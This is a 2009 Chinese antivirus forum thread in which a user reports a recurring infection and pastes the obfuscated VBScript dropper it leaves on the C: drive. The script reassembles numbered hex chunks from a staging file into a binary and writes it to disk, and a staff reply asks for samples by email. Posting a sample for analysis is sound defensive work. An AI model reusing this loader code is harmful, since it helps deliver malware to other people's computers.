Board logo

标题: 你好版主!又发现个新的病毒,目前杀不了 [打印本页]
作者: guojing075     时间: 2009-6-13 10:09    标题: 你好版主!又发现个新的病毒,目前杀不了

接通上网,自动下载在C盘根目录生成 随机名.vbs 和无后缀文件,vbs调用生成EXE文件被微点当场杀掉,但是C盘反复生成。生成来源是WINDOW脚本宿主,没问题,我把脚本宿主禁用,EXE生成不了,但是反复在C盘根目录生成 随机名.vbs随机名.无后缀文件,请问来源是哪里?

VBS内容如下:
-----------------------------------------------------
oN errOr RESUmE NeXT:m=1:DO:seT K=CReAtEoBjecT("sCRipting.FILESYSTEMObJECt"):DO whILE k.fIleeXisTS("C:\inmvzgn")=FaLSe:wSCripT.sleeP(1000):lOoP:seT v=K.OpeNtexTfIlE("C:\inmvzgn",1):dO wHiLE V.AteNdofstreAM=False:t=v.REAdLINe:e=lEN(T):c=lefT(t,2):selEcT CaSe trUE:cAse isnuMeriC(c)=False:CaSE e=3967+3 and InT(C)=m:i=I+MiD(t,3,3967):m=m+1:cASe E=911+3 and INt(c)=m:i=I+miD(T,3,911):M=m+1:eND SELECT:looP:v.CloSe:IF 16+1=m tHEN:r=LEN(I)/2:seT x=cREaTEobject("adoDb.recOrDseT"):x.fielDS.ApPeNd "M",205,r:x.OpEN:X.aDdnEW:X("M")=I:x.Update:i=X("m").GEtChUnK(r):sET q=CReatEobjEct("Adodb.STream"):WITH Q:.ModE=3:.Type=1:.OPEn():.wRItE i:.sAVEtOFilE "C:\rifqcob",2:eND WitH:wScriPt.quiT:ENd If:wScriPt.sLeeP(200):lOOp
-----------------------------------------------------
作者: Legend     时间: 2009-6-13 10:18
感谢楼主的反馈,请楼主将您描述的这些C盘下生成的“随机名.vbs 和 随机名.无后缀文件”连同微点的技术支持信息(微点主界面--辅助功能--生成技术支持信息--另存)一起给我们发送至virus@micropoint.com.cn邮箱当中,我们具体分析后给您回复
作者: Legend     时间: 2009-6-19 11:34
由于没有收到楼主的进一步反馈,此主题暂做关闭主题处理,如有其他问题,请另开新帖讨论!



欢迎光临 微点交流论坛 (http://bbs.micropoint.com.cn/) bbs.micropoint.com.cn